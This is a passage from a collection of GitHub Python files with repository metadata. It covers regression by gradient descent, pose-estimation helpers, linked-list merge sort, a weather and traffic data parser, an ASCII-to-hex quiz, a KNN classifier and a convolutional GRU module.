MLE(dataset):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y) # as the previous gives a 2D row vector\n\tdataset=dataset[:,:-1]\n\n\tone=np.ones((rows,1))\n\taug_mat=np.hstack((one,dataset)) # adding the column of ones\n\n\tprod=np.matmul(np.transpose(aug_mat),aug_mat)\n\tintermediate=np.matmul(np.linalg.inv(prod),np.transpose(aug_mat))\n\tweights=np.matmul(intermediate,y)\n\tnp.transpose(weights)\n\treturn weights\n\ndef gradDes(dataset):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tlearn_rate,number_iter,weights=hardCodeGradientDescent(columns)\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tgrad=np.zeros( ((columns),1) )\n\tdataset=dataset[:,:-1]\n\t# print(dataset.shape)\n\t# print(dataset[:10,:])\n\n\tfor i in range(number_iter):\n\t\ty_predicted=predict(weights,dataset)\n\t\tfor j in range(columns): # we exclude the last as it has the dependent variable\n\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) # ycap-y multiplied by x\n\t\t\tweights[j]-=learn_rate*grad[j] # we make use of the older values of w to get the new ones\n\n\treturn weights\n\ndef ridge(dataset,lmbda):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tlearn_rate,number_iter,weights=hardCodeGradientDescent(columns)\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tgrad=np.zeros( ((columns),1) )\n\tdataset=dataset[:,:-1]\n\n\tfor i in range(number_iter):\n\t\ty_predicted=predict(weights,dataset)\n\t\tfor j in range(columns): # we exclude the last as it has the dependent variable\n\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) + 2*lmbda*weights[j] # ycap-y multiplied by x column 
and accounting for the regularization term\n\t\t\tweights[j]-=learn_rate*grad[j] # we make use of the older values of w to get the new ones\n\n\treturn weights\n\ndef lasso(dataset,lmbda):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tlearn_rate,number_iter,weights=hardCodeGradientDescent(columns)\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tgrad=np.zeros( ((columns),1) )\n\tdataset=dataset[:,:-1]\n\n\tfor i in range(number_iter):\n\t\ty_predicted=predict(weights,dataset)\n\t\tfor j in range(columns): # we exclude the last as it has the dependent variable\n\t\t\tif(weights[j]<0):\n\t\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) - lmbda # ycap-y multiplied by x column\n\t\t\telse:\n\t\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) + lmbda\n\n\t\t\tweights[j]-=learn_rate*grad[j] # we make use of the older values of w to get the new ones\n\n\treturn weights\n\ndef normalize(dataset):\n\tmeans=dataset.mean(axis=0,keepdims=True)\n\tstddevs=dataset.std(axis=0,keepdims=True)\n\tdataset=dataset - means # subtract the corresponding means\n\tdataset=dataset / stddevs # divide by the corresponding standard deviations\n\treturn dataset\n\ndef error(weights,dataset):\n\trows=dataset.shape[0]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tcolumns=dataset.shape[1]\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tdataset=dataset[:,:-1]\n\ty_predicted=predict(weights,dataset)\n\tvalues=(y_predicted-y)\n\terror = np.matmul(np.transpose(values),values)\n\n\terror /=2*rows\n\treturn error\n\ndef main():\n\tlimit=10\n\tdataset = getData()\n\trows=dataset.shape[0]\n\tnumber_training=hardCodeTraining(rows)\n\n\t# splitting into two parts\n\ttraining_data=dataset.iloc[:number_training][:]\n\ttest_data=dataset.iloc[number_training: ][:]\n\n\t# print (training_data)\n\t# print (test_data)\n\n\t# converting to 2D matrix for ease of use\n\n\ttraining_data=training_data.values\n\ttest_data=test_data.values\n\n\tnormalised_training_data=normalize(training_data)\n\tnormalised_test_data=normalize(test_data)\n\n\tprint(\"***********MLE********************************\")\n\tweights=MLE(normalised_training_data)\n\tprint(weights)\n\tprint(\"The error is:\")\n\tprint(error(weights,normalised_test_data))\n\tprint(\"***********Gradient Descent********************************\")\n\tweights=gradDes(normalised_training_data)\n\tprint(weights)\n\tprint(\"The error is:\")\n\tprint(error(weights,normalised_test_data))\n\n\tinitalVal=1\n\tlmbda = initalVal\n\terrorList1=np.array([])\n\terrorList2=np.array([])\n\twhile lmbda>2**(-1*limit):\n\t\tprint(\"\\n\")\n\t\tprint(\"Value of lambda %s\"%(lmbda))\n\t\tprint(\"***********Lasso********************************\")\n\t\tweights=lasso(normalised_training_data,lmbda)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\terrorList1=np.append(errorList1,error(weights,normalised_test_data))\n\t\tprint(errorList1[-1])\n\t\tprint(\"***********Ridge********************************\")\n\t\tweights=ridge(normalised_training_data,lmbda)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\terrorList2=np.append(errorList2,error(weights,normalised_test_data))\n\t\tprint(errorList2[-1])\n\t\tprint(\"*************************************************\")\n\t\tlmbda/=2\n\n\n\tlmbdaVals=[2**(-1*i) for i in range(0, 
limit)]\n\n\tplot1,=plt.plot(lmbdaVals,errorList1)\n\tplot2,=plt.plot(lmbdaVals,errorList2)\n\tplt.xlabel('Lambda Value')\n\tplt.ylabel('Mean Squared Error')\n\tplt.legend([plot1,plot2],['Lasso Regression','Ridge Regression'])\n\tplt.show()\n\n\tlowerLimit=10**(-4)\n\tupperLimit=10**(-2)\n\txvals=np.array([])\n\tyvals1=np.array([])\n\tyvals2=np.array([])\n\n\tfor i in range(0,101,1):\n\t\ti=lowerLimit+lowerLimit*i\n\t\tprint(\"\\n\")\n\t\tprint(\"Value of lambda %s\"%(i))\n\t\tprint(\"***********Lasso********************************\")\n\t\tweights=lasso(normalised_training_data,i)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\tyvals1=np.append(yvals1,error(weights,normalised_test_data))\n\t\tprint(yvals1[-1])\n\t\tprint(\"***********Ridge********************************\")\n\t\tweights=ridge(normalised_training_data,i)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\tyvals2=np.append(yvals2,error(weights,normalised_test_data))\n\t\tprint(yvals2[-1])\n\t\tprint(\"*************************************************\")\n\t\txvals=np.append(xvals,i)\n\n\tplot1,=plt.plot(xvals,yvals1)\n\tplot2,=plt.plot(xvals,yvals2)\n\tplt.xlabel('Lambda Value')\n\tplt.ylabel('Mean Squared Error')\n\tplt.legend([plot1,plot2],['Lasso Regression','Ridge Regression'])\n\tplt.show()\n\nif __name__=='__main__':\n\tmain()\n","repo_name":"Vishalcross/Data_Science_Assignment","sub_path":"Assignment 3 + 4/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15574543842","text":"import cv2\nimport mediapipe as mp\nimport time\nimport pandas as pd\nimport re\nimport pickle\nimport sklearn\n\n\ndef csv_converter(path, fname):\n df = pd.read_csv(path + fname, sep=\";\")\n df_ = pd.DataFrame(data=df)\n all_coordinates = []\n all_poses = []\n for col_num in range(len(df_)):\n all_poses.append([df_.loc[col_num].values[2]])\n all_coordinates.append([])\n for i in range(3, len(df_.loc[col_num].values)):\n nums = re.findall(\"[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*(?:[eE][-+]?\\d+)?\", df_.loc[col_num].values[i])\n for num in nums:\n all_coordinates[col_num].append(float(num))\n\n return all_poses, all_coordinates\n\n\ndef pose_to_num(poses_):\n # poses_list = [\"walk\", \"fall\", \"fallen\", \"sitting\"]\n all_poses_num = []\n for pose in poses_:\n if pose[0] == \"walk\":\n all_poses_num.append([\"0\"])\n if pose[0] == \"fall\":\n all_poses_num.append([\"1\"])\n if pose[0] == \"fallen\":\n all_poses_num.append([\"2\"])\n if pose[0] == \"sitting\":\n all_poses_num.append([\"3\"])\n\n return all_poses_num\n\n\ndef get_pose_from_num(pose_number):\n if pose_number[0] == \"0\":\n return \"walk\"\n if pose_number[0] == \"1\":\n return \"fall\"\n if pose_number[0] == \"2\":\n return \"fallen\"\n if pose_number[0] == \"3\":\n return \"sitting\"\n else:\n return \"code_error\"\n\n\ndef get_coords_line(kps):\n coords_line = []\n for kp in kps:\n coords_line.append(kp[0])\n coords_line.append(kp[1])\n return coords_line\n\n\ndef get_keypoints(landmarks, w, h):\n kps = []\n kps2 = []\n for i in range(len(landmarks.landmark)):\n kps.append((landmarks.landmark[i].x * w, landmarks.landmark[i].y * h))\n return kps\n\n\ndef keypoints_parser(kps, dt_line):\n human = kps\n for points in human:\n dt_line.append((round(points[0], 2), round(points[1], 2)))\n return 
dt_line\n","repo_name":"Kexitor/HPE_Mediapipe","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9542552406","text":"from random import randint\ntupla = []\nfor i in range(0,5):\n numRandom = randint(0,10)\n tupla.append(numRandom)\ntupla = tuple(tupla)\nprint(\"The randomly generated list was: \")\nfor n in tupla:\n print(f\"{n},\", end = \" \")\nprint(f\"The smallest value in the list was {min(tupla)}\\n And the largest value was {max(tupla)}\")","repo_name":"AbelRapha/Python-Exercicios-CeV","sub_path":"Mundo 3/ex074 Maior e menor valores em uma tupla.py","file_name":"ex074 Maior e menor valores em uma tupla.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41101640468","text":"class Node:\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\nclass LL:\n\tdef __init__(self):\n\t\tself.head = None\n\n\tdef append(self, data):\n\t\tnew_node = Node(data)\n\n\t\tif self.head is None:\n\t\t\tself.head = new_node\n\t\t\treturn\n\t\ttemp = self.head\n\t\twhile temp.next is not None:\n\t\t\ttemp = temp.next\n\t\ttemp.next = new_node\n\n\t# utility function to get middle of linked list\n\tdef get_middle(self, head):\n\t\tif head == None:\n\t\t\treturn head\n\n\t\tslow = head\n\t\tfast = head\n\n\t\twhile (fast.next != None and fast.next.next != None):\n\t\t\tslow = slow.next\n\t\t\tfast = fast.next.next\n\n\t\treturn slow\n\n\tdef sorted_merge(self, a, b):\n\t\tresult = None\n\n\t\t# base cases\n\t\tif a == None:\n\t\t\treturn b\n\t\tif b == None:\n\t\t\treturn a\n\n\t\tif a.data <= b.data:\n\t\t\tresult = a\n\t\t\tresult.next = self.sorted_merge(a.next, b)\n\t\telse:\n\t\t\tresult = b\n\t\t\tresult.next = self.sorted_merge(a, b.next)\n\t\treturn result\n\n\tdef merge_sort(self, head):\n\t\t\n\t\t# base case\n\t\tif head == None or head.next == None:\n\t\t\treturn head\n\n\t\t# getting the middle of the list\n\t\tmiddle = self.get_middle(head)\n\t\tnext_to_middle = middle.next\n\n\t\tmiddle.next = None\n\n\t\tleft = self.merge_sort(head)\n\t\tright = self.merge_sort(next_to_middle)\n\n\t\tsortedlist = self.sorted_merge(left, right)\n\t\treturn sortedlist\n\n\ndef printList(head): \n    if head is None: \n        print(' ') \n        return\n    curr_node = head \n    while curr_node: \n        print(curr_node.data, end = \" \") \n        curr_node = curr_node.next\n    print(' ')\n\n\nli = LL() \n \n# Let us create an unsorted linked list \n# to test the functions created. 
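\n# Quick sanity checks implied by the base cases of merge_sort above (a minimal\n# sketch; \"empty\" and \"single\" are hypothetical lists, not built in this script):\n#   empty = LL()\n#   assert empty.merge_sort(empty.head) is None\n#   single = LL(); single.append(7)\n#   assert single.merge_sort(single.head).data == 7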
\n# The list shall be a: 2->3->20->5->10->15 \nli.append(5) \nli.append(20)\nli.append(10) \nli.append(2) \nli.append(15) \nli.append(3)\n \n# Apply merge Sort \nprint('before sort')\nprintList(li.head) \nli.head = li.merge_sort(li.head) \n\nprint (\"Sorted Linked List is:\") \nprintList(li.head) \n","repo_name":"subhaminion/Journey","sub_path":"ds/linked_list/merge_sort_on_linked_list.py","file_name":"merge_sort_on_linked_list.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23914063016","text":"# Henry Barth\r\n# Start Date: 7.17.2022\r\n# Project: Constants Used in the GUI main file\r\n\r\n# Constants\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nWINDOW_WIDTH = 760\r\nWINDOW_HEIGHT = 640\r\nFPS = 30\r\nBUTTON_WIDTH = 100\r\nX_LOCATION = (WINDOW_WIDTH / 2) - (BUTTON_WIDTH / 2)\r\n","repo_name":"HDavidBarth/LTAP_test","sub_path":"Barth.Henry_LTAP/modules/CONSTANTS.py","file_name":"CONSTANTS.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37839870129","text":"import json\nimport csv\nfrom datetime import datetime, timedelta\nimport pytz\nimport xlrd\n# import pandas as pd\n\nstart_year = 2000\nend_year = 2020\n\noutput_timezone = pytz.timezone('US/Eastern')\n\nfields = ['Year', \n 'Month', \n 'Day', \n 'Hour', \n 'Minute', \n\n 'Car Data',\n\n 'Temperature [C]', \n 'Pressure [hPa]', \n 'Humidity [%]', \n 'Wind Speed [km/h]',\n 'Wind Direction [deg]', \n 'Cloud Cover [%]', \n 'Precipitation Type', \n 'Precipitation Amount [cm]', \n\n 'CO2 ppm',\n 'Std dev CO2',\n 'No. CO2 Measurements'\n ]\n\nif __name__ == '__main__':\n \n with open('data/BU_Weather_1971-2021.json') as file:\n raw_data = json.load(file)\n\n # Set up new data store dict\n weather_data = {}\n\n for row in raw_data:\n # Set up datetime object for easier management later\n \n time_no_tz = datetime.utcfromtimestamp(int(row.get('dt'))) # No timezone because UTC\n timezone = pytz.timezone('UTC')\n time = timezone.localize(time_no_tz).astimezone(output_timezone)\n\n temp = row.get('main').get('temp')\n temp_low = row.get('main').get('temp_min')\n temp_high = row.get('main').get('temp_max')\n temp_feels = row.get('main').get('feels_like')\n\n pressure = row.get('main').get('pressure')\n humidity = row.get('main').get('humidity')\n\n wind_speed = row.get('wind').get('speed') * 3.6\n wind_direction = row.get('wind').get('deg')\n \n cloud_cover = row.get('clouds').get('all')\n\n rain_obj = row.get('rain')\n snow_obj = row.get('snow')\n\n if rain_obj is not None:\n precipitation_type = \"rain\"\n if rain_obj.get('1h') is not None:\n precipitation_amount = rain_obj.get('1h') * 10 # mm to cm\n elif rain_obj.get('3h') is not None:\n precipitation_amount = rain_obj.get('3h') * 10 / 3 # Divide by 3 to get avg hourly rate\n else:\n precipitation_amount = 0\n elif snow_obj is not None:\n precipitation_type = \"snow\"\n if snow_obj.get('1h') is not None:\n precipitation_amount = snow_obj.get('1h') * 10 # mm to cm\n elif snow_obj.get('3h') is not None:\n precipitation_amount = snow_obj.get('3h') * 10 / 3 # Divide by 3 to get avg hourly rate\n else:\n precipitation_amount = 0\n else:\n precipitation_type = \"None\"\n precipitation_amount = 0\n\n condition = row.get('weather')[0].get('description')\n\n weather_data[time] = {\n \"temp\": temp,\n \"temp_low\": temp_low,\n \"temp_high\": temp_high,\n \"pressure\": pressure,\n 
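# Note: wind_speed above was converted from m/s to km/h (* 3.6), while\n            # temp_feels is parsed above but not stored in this record.\n            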
\"humidity\": humidity,\n \"wind_speed\": wind_speed,\n \"wind_direction\": wind_direction,\n \"cloud_cover\": cloud_cover,\n \"precipitation_type\": precipitation_type,\n \"precipitation_amount\": precipitation_amount,\n \"condition\": condition\n }\n\n if time.month == 12 and time.day == 31 and time.hour == 23:\n print(\"Finished parsing \" + time.strftime('%Y'))\n\n co2_data = {}\n\n with open('data/NACP_PROJECT_BU.csv') as csv_file:\n csv_reader = csv.reader(csv_file)\n i = 3\n\n for row in csv_reader:\n if i != 0:\n i -= 1\n continue\n \n # Import time\n time_no_tz = datetime.utcfromtimestamp(int(row[0])) # No timezone because UTC\n timezone = pytz.timezone('UTC')\n time = timezone.localize(time_no_tz).astimezone(output_timezone)\n\n c02 = None if float(row[2]) == -9999 else float(row[2]) \n std_dev = None if float(row[3]) == -9999 else float(row[3])\n n = None if int(row[4]) == -9999 else int(row[4])\n\n uncertainty = int(row[5])\n lat = float(row[6])\n longitude = float(row[7])\n elevation = float(row[8])\n inlet_height = float(row[9])\n \n co2_data[time] = {\n 'co2_ppm': c02,\n 'std_dev': std_dev,\n 'num_of_measurements': n\n }\n\n car_data = {}\n\n y = 2016\n m = 11\n\n y_final = 2020\n m_final = 12\n\n while y != y_final or m != m_final:\n if m == 12:\n m = 1\n y += 1\n else:\n m += 1\n\n file_name = f\"data/car_data/MonthlyVolumeReport_AET13_{m}_{y}.xlsx\" \n\n wb = xlrd.open_workbook(file_name)\n sheet = wb.sheet_by_index(0)\n\n data = []\n\n for i in range(10, sheet.nrows):\n data.append(sheet.row_values(rowx=i, start_colx=1, end_colx=25))\n\n for row in range(len(data)):\n for col in range(len(data[row])):\n date = datetime(year=y, month=m, day=row+1, hour=col)\n car_data[output_timezone.localize(date)]= data[row][col]\n \n final_data = []\n final_data.append(fields)\n\n for key, value in car_data.items():\n year = key.year\n month = key.month\n day = key.day\n hour = key.hour\n minute = key.minute\n\n car_num = value\n\n weather = weather_data[key + timedelta(hours=-1)]\n\n co2 = co2_data.get(key, {})\n \n final_data.append([\n year,\n month,\n day,\n hour,\n minute,\n car_num,\n weather.get('temp'),\n weather.get('pressure'),\n weather.get('humidity'),\n weather.get('wind_speed'),\n weather.get('wind_direction'),\n weather.get('cloud_cover'),\n weather.get('precipitation_type'),\n weather.get('precipitation_amount'),\n co2.get('co2_ppm'),\n co2.get('std_dev'),\n co2.get('num_of_measurements')\n ])\n \n with open('final_data.csv', 'w') as file:\n write = csv.writer(file)\n write.writerows(final_data)\n","repo_name":"alextac98/openweather-parser","sub_path":"OpenWeather-Parser.py","file_name":"OpenWeather-Parser.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25664682730","text":"\n# TEST ON A NEW VIDEO FOR THE PROCESS OF BUILDING THE FOLDERS TO BE USED\n# IN THE VISUALIZATION OF THE RESULTS\n\n# =================================================================================\n# Imports ...\n# =================================================================================\nimport testDatasetConstructor\nimport testDatasetConstructorWithoutLabels\nfrom additional.videoProcessing import *\nfrom additional.constants import *\nfrom additional.processCsvFile import *\nfrom additional.directoryManipulator import *\nimport testDatasetConstructor\n\n\n# =================================================================================\n# generate dataset from new/test 
data...\n# =================================================================================\n\n\ndef generate_video_dataset():\n\n # hyper parameters\n nog = NOG # number of groups\n spr = SPG # samples per group\n nof = NOF # number of features\n noss = NOSS # number of shifted samples\n\n clear_dir(TEST_AUDIO_PATH)\n\n file_rows = list()\n\n CsvFile.remove_file(\"../\" + TEST_DIR_PATH + \"/\" + TEST_DATASET_PATH)\n features_file = CsvFile(TEST_DIR_PATH + \"/\" + TEST_DATASET_PATH, \"w\")\n\n paths_train = [TEST_VIDEO_PATH, TEST_AUDIO_PATH]\n\n # make sure that the 'test/test_videos' directory has just ONE video\n if len(np.array(list(os.listdir(\"test_videos\")))) > 1:\n print(\"Directory 'test/test_videos' CAN ONLY HAVE one video.\")\n exit(0)\n\n # in constants.py change LABELS value to \"True\" in case you want Supervised classification\n if LABELS:\n testDatasetConstructor.construct(paths_train, nog, spr,\n noss, features_file, file_rows)\n else:\n testDatasetConstructorWithoutLabels.construct(paths_train, nog, spr,\n noss, features_file, file_rows)\n\n\nif __name__ == \"__main__\":\n generate_video_dataset()\n","repo_name":"carina-haaf/PRJ_47_45118","sub_path":"03_Implementacao/projetos/prj_python/test/generateTestVideoDataset.py","file_name":"generateTestVideoDataset.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45022027557","text":"import os\r\nimport random\r\nimport binascii\r\nfrom colorama import init, Fore\r\n\r\nos.system(\"cls || clear\") \r\ninit()\r\nbanner = Fore.RED + f\"\"\"\r\n _ _ _______ _ _ \r\n /\\ (_|_) |__ __| | | | | \r\n / \\ ___ ___ _ _ | | ___ | |__| | _____ __\r\n / /\\ \\ / __|/ __| | | | |/ _ \\ | __ |/ _ \\ \\/ /\r\n / ____ \\\\\\\\__ \\ (__| | | | | (_) | | | | | __/> < \r\n /_/ \\_\\___/\\___|_|_| |_|\\___/ |_| |_|\\___/_/\\_\\\\ \r\n \r\n By : @Unknown-user-dev \r\n https://github.com/Unknown-user-dev\r\n Idea of my teacher, thank you. I redid the code\r\n\"\"\"\r\n\r\nprint(banner)\r\n\r\ndef menu():\r\n print(Fore.GREEN + \"\"\"\r\n [1] Convert Ascii to Hex\r\n [2] Credits\r\n [3] Exit\r\n \"\"\")\r\n choice = input(Fore.BLUE + \"Your choice : \" + Fore.WHITE)\r\n if choice not in [\"1\", \"2\", \"3\"]:\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.RED + \"Please enter a valid choice\" + Fore.WHITE)\r\n menu()\r\n\r\n if choice == \"2\":\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.GREEN + \"By : @Unknown-user-dev | github.com/Unknown-user-dev | >_Unknown User#8624 | Student of Lycée Robespierre 2TNE\" + Fore.WHITE)\r\n menu()\r\n elif choice == \"3\":\r\n print(Fore.RED + \"Bye !\" + Fore.WHITE)\r\n exit()\r\n if choice == \"1\":\r\n os.system(\"cls || clear\")\r\n name = input(Fore.GREEN + \"Enter your name : \" + Fore.WHITE)\r\n note = 0\r\n while True:\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.GREEN + f\"Name : {name} | Note : {note}\" + Fore.WHITE)\r\n print(Fore.BLUE + \"Convert the following text to hex\" + Fore.WHITE)\r\n word = \"\"\r\n for i in range(10): word += random.choice(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\") # my teacher who told me that I had forgotten the capital letters ;(\r\n print(Fore.RED + word + Fore.WHITE)\r\n print(Fore.GREEN + \"Your answer : \" + Fore.WHITE, end=\"\")\r\n answer = input()\r\n if answer == binascii.hexlify(word.encode()).decode(): note += 0.5\r\n else: note -= 1\r\n if note >= 40: # The rating system was 
fixed by my friend @NotFubukIl\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.GREEN + f\"Name : {name} | Note : {note}\" + Fore.WHITE)\r\n print(Fore.GREEN + \"Good job You have 40 Points!\" + Fore.WHITE)\r\n exit()\r\n\r\n \r\nif __name__ == \"__main__\": menu()\r\n","repo_name":"Unknown-user-dev/Ascii-To-Hex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"10022026077","text":"# -*- coding: utf-8 -*-\n#@Time :2020/12/19 16:04\n#@Author :张士澜\n#@File :KNN.py\n#@Software :PyCharm\n\nimport numpy as np\nimport operator\n\nclass KNN(object):\n\n def __init__(self,k = 3):\n self.k = k\n\n def fit(self,x,y):\n self.x = x\n self.y = y\n\n def _square_distance(self,v1,v2):\n return np.sum(np.square(v1-v2))\n\n def _vote(self,ys):\n ys_unique = np.unique(ys)\n vote_dic = {}\n for y in ys:\n if y not in vote_dic.keys():\n vote_dic[y] = 1\n else:\n vote_dic[y] += 1\n sorted_vote_dict = sorted(vote_dic.items(),key = operator.itemgetter(1),reverse = True)\n return sorted_vote_dict[0][0]\n\n def predict(self,x):\n y_pred = []\n for i in range(len(x)):\n dist_arr = [self._square_distance(x[i],self.x[j]) for j in range(len(self.x))]\n sorted_index = np.argsort(dist_arr)\n top_k_index = sorted_index[:self.k]\n y_pred.append(self._vote(ys = self.y[top_k_index]))\n return np.array(y_pred)\n\n def score(self,y_ture = None,y_pred = None):\n if y_ture is None or y_pred is None:\n y_pred = self.predict(self.x)\n y_ture = self.y\n score = 0.0\n for i in range(len(y_ture)):\n if y_ture[i] == y_pred[i]:\n score += 1\n score /= len(y_ture)\n return score","repo_name":"zhangshilan/python_demo","sub_path":"KNN_test/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30204116913","text":"# Implements a Convolutional GRU Cell\n# Code almost copied from https://github.com/jacobkimmel/pytorch_convgru/blob/master/convgru.py\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch.nn import init\n\n\nclass ConvGRUCell(nn.Module):\n \"\"\"\n Generate a convolutional GRU cell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, kernel_size, act_fn):\n super().__init__()\n padding = kernel_size // 2\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.reset_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)\n self.update_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)\n self.out_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)\n self.act_fn = act_fn\n\n init.orthogonal(self.reset_gate.weight)\n init.orthogonal(self.update_gate.weight)\n init.orthogonal(self.out_gate.weight)\n init.constant(self.reset_gate.bias, 0.)\n init.constant(self.update_gate.bias, 0.)\n init.constant(self.out_gate.bias, 0.)\n\n\n def forward(self, input_, prev_state):\n\n # get batch and spatial sizes\n batch_size = input_.data.size()[0]\n spatial_size = input_.data.size()[2:]\n\n # generate empty prev_state, if None is provided\n if prev_state is None:\n state_size = [batch_size, self.hidden_size] + list(spatial_size)\n if torch.cuda.is_available():\n prev_state = Variable(torch.zeros(state_size)).cuda()\n else:\n prev_state = 
Variable(torch.zeros(state_size))\n\n # data size is [batch, channel, height, width]\n stacked_inputs = torch.cat([input_, prev_state], dim=1)\n update = F.sigmoid(self.update_gate(stacked_inputs))\n reset = F.sigmoid(self.reset_gate(stacked_inputs))\n out_inputs = self.act_fn(self.out_gate(torch.cat([input_, prev_state * reset], dim=1)))\n new_state = prev_state * (1 - update) + out_inputs * update\n\n return new_state\n\n\nclass ConvGRU(nn.Module):\n\n def __init__(self, input_size, hidden_size, \n kernel_size, timesteps,\n nl='tanh'):\n '''\n Generates a multi-layer convolutional GRU.\n Preserves spatial dimensions across cells, only altering depth.\n\n Parameters\n ----------\n input_size : integer. depth dimension of input tensors.\n hidden_sizes : integer or list. depth dimensions of hidden state.\n if integer, the same hidden size is used for all cells.\n kernel_sizes : integer or list. sizes of Conv2d gate kernels.\n if integer, the same kernel size is used for all cells.\n n_layers : integer. number of chained `ConvGRUCell`.\n '''\n\n super(ConvGRU, self).__init__()\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.kernel_size = kernel_size\n self.timesteps = timesteps\n if nl == 'tanh':\n self.act_fn = nn.Tanh()\n elif nl == 'relu':\n self.act_fn = nn.ReLU()\n else:\n raise ValueError('Unknown non-linearity')\n self.cell = ConvGRUCell(self.input_size, self.hidden_size, self.kernel_size, self.act_fn)\n\n def forward(self, input):\n '''\n Parameters\n ----------\n input : 4D input tensor. (batch, channels, height, width).\n hidden : list of 4D hidden state representations. (batch, channels, height, width).\n\n Returns\n -------\n upd_hidden : 5D hidden representation. (layer, batch, channels, height, width).\n '''\n batch_size, _, height, width = input.size()\n hidden = torch.zeros(batch_size, self.hidden_size, height, width).to(input.device)\n\n upd_hidden = []\n print(self.timesteps, \"timesteps\")\n for _ in range(self.timesteps):\n # pass through layer\n hidden = self.cell(input, hidden)\n\n # retain tensors in list to allow different hidden sizes\n return hidden\n","repo_name":"vijayvee/pathfinder","sub_path":"models/convgru.py","file_name":"convgru.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26951874636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 11 15:35:12 2019\n\n@author: ediberto\n\"\"\"\n\n#%%\ndef getListOfFiles(dirName):\n # create a list of file and sub directories \n # names in the given directory \n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory \n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n \n return allFiles \n######################################################################################\n\ndef EnergyPercent(Ac,Dc,Original):\n \n E=np.empty((1,np.size(Dc,1)+1),float)\n Ep=np.zeros((1,np.size(Dc,1)+1),float)\n \n Et=np.sum(np.square(Original))\n \n for i in range(0,np.size(Dc,1)):\n E[0,i]=np.sum(np.square(Dc[0,i]))\n \n E[0,i+1]=np.sum(np.square(Ac))\n\n\n Ep=E/Et;\n \n return Ep;\n\n \n\n#######################################################################################\n#Ler amostra do 
